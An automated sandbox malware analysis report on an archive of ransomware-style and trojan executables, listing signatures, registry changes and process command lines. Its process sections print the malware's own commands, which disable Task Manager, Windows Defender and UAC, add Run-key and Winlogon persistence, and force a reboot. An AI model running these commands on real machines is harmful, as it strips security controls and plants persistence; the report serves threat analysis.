Malware Analysis Report

2024-11-13 18:03

Sample ID 241108-rjl4wawmdl
Target Dest.rar
SHA256 ceba879db245f9a04c51607671ceeb214afbf10ea12f59bbea9202f94eff65e9
Tags
aspackv2 discovery ransomware upx evasion persistence trojan bootkit exploit
score
10/10

Analysis Overview

Threat Level: Known bad

The file Dest.rar was found to be: Known bad.

Malicious Activity Summary

UAC bypass

Modifies WinLogon for persistence

Possible privilege escalation attempt

Disables Task Manager via registry modification

ASPack v2.12-2.42

Modifies file permissions

Executes dropped EXE

Adds Run key to start application

Writes to the Master Boot Record (MBR)

UPX packed file

Sets desktop wallpaper using registry

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Kills process with taskkill

System policy modification

Delays execution with timeout.exe

Modifies Control Panel

Modifies registry class

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 14:13

Signatures

UPX packed file

upx

Unsigned PE

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:19

Platform

win11-20241007-en

Max time kernel

292s

Max time network

282s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe"

Signatures

ASPack v2.12-2.42

aspackv2

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A

UPX packed file

upx

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat" "

C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe

clwcp c:\covid20\bg.bmp

C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe

flasher 5 c:\covid20\covid.bmp

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs"

Network

Files

memory/1976-0-0x0000000000400000-0x0000000001A7B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat

C:\Users\Admin\AppData\Local\Temp\9347.tmp\bg.bmp

C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bmp

C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe

C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe

C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:14

Platform

win11-20241007-en

Max time kernel

9s

Max time network

12s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"

Signatures

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Disables Task Manager via registry modification

evasion

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A

UPX packed file

upx

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "200" | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2884 wrote to memory of 3920 | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | C:\Windows\SysWOW64\cmd.exe
PID 2884 wrote to memory of 3920 | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | C:\Windows\SysWOW64\cmd.exe
PID 2884 wrote to memory of 3920 | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | C:\Windows\SysWOW64\cmd.exe
PID 3920 wrote to memory of 1320 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 3920 wrote to memory of 1320 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 3920 wrote to memory of 1320 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 3920 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4756 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4756 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4756 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 244 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3920 wrote to memory of 244 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3920 wrote to memory of 244 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 3920 wrote to memory of 4840 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4840 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4840 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4836 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4836 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4836 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 3920 wrote to memory of 4844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 3920 wrote to memory of 4844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 4844 wrote to memory of 1264 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 4844 wrote to memory of 1264 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 4844 wrote to memory of 1264 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 3920 wrote to memory of 1044 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\shutdown.exe
PID 3920 wrote to memory of 1044 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\shutdown.exe
PID 3920 wrote to memory of 1044 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\shutdown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d

Network

N/A

Files

memory/2884-0-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat

C:\Users\Admin\AppData\Local\Temp\A345.tmp\prompt.vbs

C:\Users\Admin\AppData\Local\Temp\A345.tmp\blood.bmp

C:\Users\Admin\AppData\Local\Temp\A345.tmp\Service64.exe

memory/2884-18-0x0000000000400000-0x000000000132F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:14

Platform

win11-20241007-en

Max time kernel

4s

Max time network

7s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"

Signatures

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Disables Task Manager via registry modification

evasion

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" | C:\Windows\SysWOW64\reg.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" | C:\Windows\SysWOW64\reg.exe | N/A

UPX packed file

upx

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209" | C:\Windows\system32\LogonUI.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4760 wrote to memory of 2288 | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 2288 | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 2288 | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | C:\Windows\SysWOW64\cmd.exe
PID 2288 wrote to memory of 2140 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2140 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2140 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2732 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2732 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2732 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2524 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2524 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2524 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2500 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2816 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2816 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2816 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4812 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4812 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4812 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2444 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\shutdown.exe
PID 2288 wrote to memory of 2444 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\shutdown.exe
PID 2288 wrote to memory of 2444 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\shutdown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d

Network

Files

memory/4760-0-0x0000000000400000-0x0000000000A12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd

C:\Users\Admin\AppData\Local\Temp\81C3.tmp\note.bmp

C:\Users\Admin\AppData\Local\Temp\81C3.tmp\HostFile.exe

memory/4760-15-0x0000000000400000-0x0000000000A12000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:17

Platform

win11-20241007-en

Max time kernel

219s

Max time network

202s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\windows\SysWOW64\takeown.exe | N/A
N/A | N/A | C:\windows\SysWOW64\icacls.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\windows\SysWOW64\takeown.exe | N/A
N/A | N/A | C:\windows\SysWOW64\icacls.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A
